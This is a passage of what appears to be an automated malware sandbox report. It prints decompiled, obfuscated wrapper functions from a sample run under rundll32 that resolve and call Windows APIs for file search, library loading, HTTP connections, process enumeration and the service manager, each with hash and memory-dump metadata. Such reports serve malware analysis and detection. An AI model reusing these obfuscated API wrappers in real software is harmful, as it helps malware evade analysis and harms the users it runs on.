                                                                                                                                				void* _t49;
                                                                                                                                				signed int _t51;
                                                                                                                                				signed int _t52;
                                                                                                                                				signed int _t53;
                                                                                                                                
                                                                                                                                				E00F4BB26(_t38);
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v24 = 0xcffb4;
                                                                                                                                				_v20 = 0x21620f;
                                                                                                                                				_v8 = 0xfe3f;
                                                                                                                                				_t51 = 0x15;
                                                                                                                                				_v8 = _v8 / _t51;
                                                                                                                                				_v8 = _v8 + 0xffff0986;
                                                                                                                                				_t52 = 0xe;
                                                                                                                                				_v8 = _v8 / _t52;
                                                                                                                                				_v8 = _v8 ^ 0x124952a5;
                                                                                                                                				_v12 = 0xeeb7;
                                                                                                                                				_v12 = _v12 >> 0xe;
                                                                                                                                				_t53 = 0x6b;
                                                                                                                                				_v12 = _v12 / _t53;
                                                                                                                                				_v12 = _v12 ^ 0x00004779;
                                                                                                                                				_t48 = E00F5915E(0x10f, 0xb1929998, 0xf90a85c5);
                                                                                                                                				_t49 =  *_t48(_a8, __ecx, __edx, _a4, _a8); // executed
                                                                                                                                				return _t49;
                                                                                                                                			}














                                                                                                                                APIs
                                                                                                                                • GetNativeSystemInfo.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F4438A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                • String ID: yG
                                                                                                                                • API String ID: 1721193555-1469842547
                                                                                                                                • Opcode ID: 42efb6d08359ec9ccb781363735e29a1015edebb01dc1a48c880ffb3dea5581b
                                                                                                                                • Instruction ID: 5a648f68b1111d225a3385e7dcabf46597b6ff62eca455e8b2dc207ca331659c
                                                                                                                                • Opcode Fuzzy Hash: 42efb6d08359ec9ccb781363735e29a1015edebb01dc1a48c880ffb3dea5581b
                                                                                                                                • Instruction Fuzzy Hash: CE1161B6E0120CFBEF14DFE4C94A9DDBBB2EB84310F20C099E9046B294D7B65B559B40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 68%
                                                                                                                                			E00F49124(void* __ecx, void* __edx, void* _a4, struct _WIN32_FIND_DATAW* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                				unsigned int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t25;
                                                                                                                                				int _t32;
                                                                                                                                				signed int _t34;
                                                                                                                                
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				E00F4BB26(_t25);
                                                                                                                                				_v12 = 0x6b4f;
                                                                                                                                				_v12 = _v12 ^ 0x678cd26f;
                                                                                                                                				_v12 = _v12 ^ 0x678cefb7;
                                                                                                                                				_v8 = 0x4189;
                                                                                                                                				_t34 = 0xa;
                                                                                                                                				_v8 = _v8 / _t34;
                                                                                                                                				_v8 = _v8 >> 5;
                                                                                                                                				_v8 = _v8 ^ 0x00006796;
                                                                                                                                				E00F5915E(0x131, 0xc63be0fd, 0xf90a85c5);
                                                                                                                                				_t32 = FindNextFileW(_a4, _a8); // executed
                                                                                                                                				return _t32;
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • FindNextFileW.KERNELBASE(678CEFB7,?), ref: 00F49196
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindNext
                                                                                                                                • String ID: Ok
                                                                                                                                • API String ID: 2029273394-3965254117
                                                                                                                                • Opcode ID: 2c9607e2994ca0132c2629e868301ca9668b96cdf8354782933cabe97ea9329a
                                                                                                                                • Instruction ID: 1810421ef093bbed244e0b9cd38a9fd7dc8b96b282f1f9736a98f84dceb0c20d
                                                                                                                                • Opcode Fuzzy Hash: 2c9607e2994ca0132c2629e868301ca9668b96cdf8354782933cabe97ea9329a
                                                                                                                                • Instruction Fuzzy Hash: 460131B5905208FBDF04DFE0CD469DEBFB6EB54300F108498F90496250D7769F64AB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 75%
                                                                                                                                			E00F44231(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				signed int _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				intOrPtr _v28;
                                                                                                                                				void* _t24;
                                                                                                                                				struct HINSTANCE__* _t29;
                                                                                                                                				WCHAR* _t33;
                                                                                                                                
                                                                                                                                				_push(_a12);
                                                                                                                                				_t33 = __ecx;
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t24);
                                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v28 = 0x7472c3;
                                                                                                                                				_v24 = 0x3cf48e;
                                                                                                                                				_v12 = 0x873a;
                                                                                                                                				_v12 = _v12 ^ 0x8b6a531b;
                                                                                                                                				_v12 = _v12 ^ 0x8b6afc74;
                                                                                                                                				_v8 = 0x3a82;
                                                                                                                                				_v8 = _v8 | 0x092d362c;
                                                                                                                                				_v8 = _v8 + 0xffffba9d;
                                                                                                                                				_v8 = _v8 ^ 0x092cd7ad;
                                                                                                                                				E00F5915E(0x11f, 0x87b33670, 0xf90a85c5);
                                                                                                                                				_t29 = LoadLibraryW(_t33); // executed
                                                                                                                                				return _t29;
                                                                                                                                			}












                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?), ref: 00F442B2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: ,6-
                                                                                                                                • API String ID: 1029625771-2997925107
                                                                                                                                • Opcode ID: 928f9de9d1f7c5ce193d0202e3949f5635036c8e82479e1528a6c3d2386ca005
                                                                                                                                • Instruction ID: 0b8212f3b4d02a42528234abdf1f9d9277722f3f7653b94b7688765aa54fecdd
                                                                                                                                • Opcode Fuzzy Hash: 928f9de9d1f7c5ce193d0202e3949f5635036c8e82479e1528a6c3d2386ca005
                                                                                                                                • Instruction Fuzzy Hash: E30128B5C15209FBDF04EFE4C80AADEBBB5FB10315F108188E914A6211D3B54B549B92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 20%
                                                                                                                                			E00F45868(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				void* __edx;
                                                                                                                                				void* _t21;
                                                                                                                                				int _t26;
                                                                                                                                				void* _t29;
                                                                                                                                				void* _t30;
                                                                                                                                
                                                                                                                                				_push(_a8);
                                                                                                                                				_t30 = __ecx;
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t21);
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v24 = 0x752ec3;
                                                                                                                                				_v20 = 0x5fe517;
                                                                                                                                				_v8 = 0xe5f2;
                                                                                                                                				_v8 = _v8 + 0xffff7216;
                                                                                                                                				_v8 = _v8 | 0xe5b4b10b;
                                                                                                                                				_v8 = _v8 ^ 0xe5b4c8d8;
                                                                                                                                				_v12 = 0xd5b0;
                                                                                                                                				_v12 = _v12 + 0xffff864e;
                                                                                                                                				_v12 = _v12 ^ 0x0000777c;
                                                                                                                                				_push(0x699633b1);
                                                                                                                                				_push(0x7ca02a6d);
                                                                                                                                				_t29 = 0x2f;
                                                                                                                                				E00F5915E(_t29);
                                                                                                                                				_t26 = InternetCloseHandle(_t30); // executed
                                                                                                                                				return _t26;
                                                                                                                                			}














                                                                                                                                APIs
                                                                                                                                • InternetCloseHandle.WININET(?,?,?,?,?,?), ref: 00F458E0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandleInternet
                                                                                                                                • String ID: |w
                                                                                                                                • API String ID: 1081599783-204652698
                                                                                                                                • Opcode ID: 8c65f9315396dccea8f5f0357f7f064bcd510294474e00413fd2794daba787d7
                                                                                                                                • Instruction ID: 26e56e47e331808cc1b0d8a3f8f91e6e985bcf7656bf6c41e97aee5398ab2f47
                                                                                                                                • Opcode Fuzzy Hash: 8c65f9315396dccea8f5f0357f7f064bcd510294474e00413fd2794daba787d7
                                                                                                                                • Instruction Fuzzy Hash: 78016D75C0571CBBDB10DF94DC4A8AEBF74EB40319F108198E80466261E7B84B049B91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E00F523A0(void* __ecx, struct tagPROCESSENTRY32W __edx, intOrPtr _a4, void* _a8) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t20;
                                                                                                                                				int _t26;
                                                                                                                                				struct tagPROCESSENTRY32W _t31;
                                                                                                                                
                                                                                                                                				_push(_a8);
                                                                                                                                				_t31 = __edx;
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__edx);
                                                                                                                                				E00F4BB26(_t20);
                                                                                                                                				_v12 = 0x6c20;
                                                                                                                                				_v12 = _v12 * 0x71;
                                                                                                                                				_v12 = _v12 ^ 0xf09b7a3b;
                                                                                                                                				_v12 = _v12 ^ 0xf0b4e3b2;
                                                                                                                                				_v8 = 0x2bb2;
                                                                                                                                				_v8 = _v8 | 0x783053b8;
                                                                                                                                				_v8 = _v8 ^ 0x6a324d53;
                                                                                                                                				_v8 = _v8 ^ 0x12023e9f;
                                                                                                                                				E00F5915E(0x18c, 0xd5f38484, 0xf90a85c5);
                                                                                                                                				_t26 = Process32NextW(_a8, _t31); // executed
                                                                                                                                				return _t26;
                                                                                                                                			}









                                                                                                                                APIs
                                                                                                                                • Process32NextW.KERNEL32(?,?), ref: 00F52411
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: NextProcess32
                                                                                                                                • String ID: SM2j
                                                                                                                                • API String ID: 1850201408-3232349684
                                                                                                                                • Opcode ID: 876c2141c2e661c6b44c41ceee14b4604e578ba9fb82596e1e3333c5e09ef1ca
                                                                                                                                • Instruction ID: 312fd154dcb6d74c0b50277b2edb5fed6df0ef92cd43ce07160bf960fa19554c
                                                                                                                                • Opcode Fuzzy Hash: 876c2141c2e661c6b44c41ceee14b4604e578ba9fb82596e1e3333c5e09ef1ca
                                                                                                                                • Instruction Fuzzy Hash: 3CF03C75801218BBDF19DFA4DD4A8DEBF79EB00310F208199EC19AB261D7B65B50AB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 33%
                                                                                                                                			E00F59289(long __ecx, void* __edx, intOrPtr _a8, WCHAR* _a12, intOrPtr _a20, void* _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t35;
                                                                                                                                				void* _t44;
                                                                                                                                				signed int _t46;
                                                                                                                                				long _t55;
                                                                                                                                
                                                                                                                                				_push(__ecx);
                                                                                                                                				_push(__ecx);
                                                                                                                                				_t55 = __ecx;
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a52);
                                                                                                                                				_push(_a48);
                                                                                                                                				_push(_a44);
                                                                                                                                				_push(_a40);
                                                                                                                                				_push(_a36);
                                                                                                                                				_push(_a32);
                                                                                                                                				_push(_a28);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a20);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(0);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t35);
                                                                                                                                				_v8 = 0x7a40;
                                                                                                                                				_t46 = 0x7b;
                                                                                                                                				_t17 = _t46 + 0x29; // 0xa4
                                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                                				_v8 = _v8 * 0x3d;
                                                                                                                                				_v8 = _v8 * 0x54;
                                                                                                                                				_v8 = _v8 ^ 0x0013a359;
                                                                                                                                				_v12 = 0x4ef4;
                                                                                                                                				_v12 = _v12 | 0xfbc47bc3;
                                                                                                                                				_v12 = _v12 ^ 0xfbc459ee;
                                                                                                                                				E00F5915E(_t17, 0xd4e42328, 0x699633b1);
                                                                                                                                				_t44 = HttpOpenRequestW(_a28, _a52, _a12, 0, 0, 0, _t55, 0); // executed
                                                                                                                                				return _t44;
                                                                                                                                			}










                                                                                                                                APIs
                                                                                                                                • HttpOpenRequestW.WININET(3F91AD12,346AC6FB,?,00000000,00000000,00000000,03849AC0,00000000), ref: 00F59327
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpOpenRequest
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1984915467-0
                                                                                                                                • Opcode ID: 4319b0463a4fc2bc923d5790b4d62b29149974737dd154d41e00b651d945fa70
                                                                                                                                • Instruction ID: 47775123b6d0f9282f9cd3dcadda0d9a44388925199b53d72705f4b418b34c84
                                                                                                                                • Opcode Fuzzy Hash: 4319b0463a4fc2bc923d5790b4d62b29149974737dd154d41e00b651d945fa70
                                                                                                                                • Instruction Fuzzy Hash: 52110632801248FBDF15CF92DD0ACDFBF79EB89710F508159F90862120D3769A61EB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 35%
                                                                                                                                			E00F587B3(void* __ecx, void* __edx, long _a4, void* _a8, WCHAR* _a20, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52) {
                                                                                                                                				signed int _v8;
                                                                                                                                				void* _t32;
                                                                                                                                				short _t40;
                                                                                                                                
                                                                                                                                				_t40 = _a28;
                                                                                                                                				_push(_a52);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a44);
                                                                                                                                				_push(_a40);
                                                                                                                                				_push(_a36);
                                                                                                                                				_push(_a32);
                                                                                                                                				_push(_t40 & 0x0000ffff);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a20);
                                                                                                                                				_push(0);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				E00F4BB26(_t40 & 0x0000ffff);
                                                                                                                                				_a28 = 0x6caf;
                                                                                                                                				_a28 = _a28 + 0xae90;
                                                                                                                                				_a28 = _a28 ^ 0x047ea52a;
                                                                                                                                				_a28 = _a28 ^ 0x047fb6d5;
                                                                                                                                				_v8 = 0x6aa5;
                                                                                                                                				_v8 = _v8 + 0xffffe3fe;
                                                                                                                                				_v8 = _v8 ^ 0x000066a8;
                                                                                                                                				E00F5915E(0xf3, 0x5d16645c, 0x699633b1);
                                                                                                                                				_t32 = InternetConnectW(_a8, _a20, _t40, 0, 0, _a4, 0, 0); // executed
                                                                                                                                				return _t32;
                                                                                                                                			}







                                                                                                                                APIs
                                                                                                                                • InternetConnectW.WININET(?,?,3F91AD12,00000000,00000000,?,00000000,00000000), ref: 00F58844
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ConnectInternet
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3050416762-0
                                                                                                                                • Opcode ID: e73e0751d0cf8b9f94db98a6de33b63938227a77f19ecab0cf615805a1cd11a9
                                                                                                                                • Instruction ID: de5e6c3c76f9312423b276029bf8af3930aa3f7cd706396cdd30969e8fadd1bc
                                                                                                                                • Opcode Fuzzy Hash: e73e0751d0cf8b9f94db98a6de33b63938227a77f19ecab0cf615805a1cd11a9
                                                                                                                                • Instruction Fuzzy Hash: E911E872400188BBEF119E96CC09CEF3F79EBC9768F414248FD4866120D376DA24EBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,000011A2,010512CF), ref: 00F543C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                • Opcode ID: 853bbbaac74536f122fd52fe8a738f5108b7cf8b532cec8be3e45c95b75b05b2
                                                                                                                                • Instruction ID: e0f49f61f9850de8af8ba85cd1b437e23acc1f161f390e4fb533e04ac6924ab5
                                                                                                                                • Opcode Fuzzy Hash: 853bbbaac74536f122fd52fe8a738f5108b7cf8b532cec8be3e45c95b75b05b2
                                                                                                                                • Instruction Fuzzy Hash: 8A11CE72802268FBDF659F91DD49CDF7E79EF0A2A4F504044BA0922120D3768A60EBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 47%
                                                                                                                                			E00F44A84(long __ecx, void* __edx, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, WCHAR* _a24, long _a28, intOrPtr _a32, long _a36) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				struct _SECURITY_ATTRIBUTES* _v16;
                                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				intOrPtr _v28;
                                                                                                                                				void* _t29;
                                                                                                                                				void* _t35;
                                                                                                                                				long _t40;
                                                                                                                                
                                                                                                                                				_t40 = __ecx;
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a36);
                                                                                                                                				_push(_a32);
                                                                                                                                				_push(_a28);
                                                                                                                                				_push(_a24);
                                                                                                                                				_push(_a20);
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(0);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t29);
                                                                                                                                				_v28 = 0x1f9dbe;
                                                                                                                                				_v24 = 0xc8df6;
                                                                                                                                				_v20 = 0;
                                                                                                                                				_v16 = 0;
                                                                                                                                				_v12 = 0xe92e;
                                                                                                                                				_v12 = _v12 * 0x28;
                                                                                                                                				_v12 = _v12 ^ 0x002460dc;
                                                                                                                                				_v8 = 0x4fd2;
                                                                                                                                				_v8 = _v8 | 0x7ddf2b24;
                                                                                                                                				_v8 = _v8 ^ 0x7ddf4bdc;
                                                                                                                                				E00F5915E(0x20a, 0xd56ccf6d, 0xf90a85c5);
                                                                                                                                				_t35 = CreateFileW(_a24, _t40, _a8, 0, _a36, _a28, 0); // executed
                                                                                                                                				return _t35;
                                                                                                                                			}













                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNEL32(2829A97E,00000001,?,00000000,?,00000000,00000000), ref: 00F44B1E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: 6adaf1209f7bf945a7181296bc6131e9dd0e40351077341de236bae8549b8559
                                                                                                                                • Instruction ID: bda0be95eb7fd0c1093b6e04310902e6dab5f21afe7d8d1f6a19dd606f8c046e
                                                                                                                                • Opcode Fuzzy Hash: 6adaf1209f7bf945a7181296bc6131e9dd0e40351077341de236bae8549b8559
                                                                                                                                • Instruction Fuzzy Hash: FA111372801209BBCF069FD5CD49CDEBFB9EF88310F118189FA1462221D3768A61EB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 68%
                                                                                                                                			E00F4A681(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, int _a16) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t33;
                                                                                                                                				void* _t43;
                                                                                                                                				signed int _t45;
                                                                                                                                				signed int _t46;
                                                                                                                                
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(0);
                                                                                                                                				E00F4BB26(_t33);
                                                                                                                                				_v12 = 0x5706;
                                                                                                                                				_v12 = _v12 << 8;
                                                                                                                                				_t45 = 0x58;
                                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                                				_v12 = _v12 ^ 0x0000a367;
                                                                                                                                				_v8 = 0x9ddb;
                                                                                                                                				_v8 = _v8 + 0x5c6;
                                                                                                                                				_v8 = _v8 >> 6;
                                                                                                                                				_t46 = 0x4e;
                                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                                				_v8 = _v8 ^ 0x0000134e;
                                                                                                                                				E00F5915E(0x1d9, 0x6abbc736, 0x4454fbab);
                                                                                                                                				_t43 = OpenSCManagerW(0, 0, _a16); // executed
                                                                                                                                				return _t43;
                                                                                                                                			}










                                                                                                                                APIs
                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 00F4A70A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ManagerOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1889721586-0
                                                                                                                                • Opcode ID: d203dab8b0b05960c36d205f664f3b1ea026a5ba8fdb8b54a0a6e037f7478e59
                                                                                                                                • Instruction ID: 043e9377b481e5ba77b44c92ee568d749c9058d1a41789bf1046c031fb8bd92a
                                                                                                                                • Opcode Fuzzy Hash: d203dab8b0b05960c36d205f664f3b1ea026a5ba8fdb8b54a0a6e037f7478e59
                                                                                                                                • Instruction Fuzzy Hash: 8E112372A01208FBEB14CF95DD498CEBFB5EB45314F108089E90867280D7B95B60AB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 73%
                                                                                                                                			E00F53FE4(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, struct tagPROCESSENTRY32W* _a12, intOrPtr _a16) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				signed int _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				void* _t41;
                                                                                                                                				void* _t51;
                                                                                                                                				signed int _t53;
                                                                                                                                				signed int _t54;
                                                                                                                                				signed int _t55;
                                                                                                                                
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__edx);
                                                                                                                                				E00F4BB26(_t41);
                                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v24 = 0x57769e;
                                                                                                                                				_v12 = 0xf966;
                                                                                                                                				_t53 = 0x16;
                                                                                                                                				_v12 = _v12 / _t53;
                                                                                                                                				_v12 = _v12 ^ 0x00006aa1;
                                                                                                                                				_v8 = 0x861b;
                                                                                                                                				_v8 = _v8 << 7;
                                                                                                                                				_t54 = 0x6d;
                                                                                                                                				_v8 = _v8 / _t54;
                                                                                                                                				_t55 = 0x53;
                                                                                                                                				_t33 = _t55 + 0x7b; // 0xce
                                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                                				_v8 = _v8 ^ 0x000006cc;
                                                                                                                                				_t51 = E00F5915E(_t33, 0x7b8bbe67, 0xf90a85c5);
                                                                                                                                				Process32FirstW(_a8, _a12); // executed
                                                                                                                                				return _t51;
                                                                                                                                			}














                                                                                                                                APIs
                                                                                                                                • Process32FirstW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,839BC4E5), ref: 00F54077
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FirstProcess32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2623510744-0
                                                                                                                                • Opcode ID: 7a2e86987826a3f7980d72e901c2664314dcde1ee0692125ebe5669abf9fef80
                                                                                                                                • Instruction ID: 5d14271e3fa31d8e310893a413aef6b4b6c7499fc6dea9dde1ae1be8d4d8aab5
                                                                                                                                • Opcode Fuzzy Hash: 7a2e86987826a3f7980d72e901c2664314dcde1ee0692125ebe5669abf9fef80
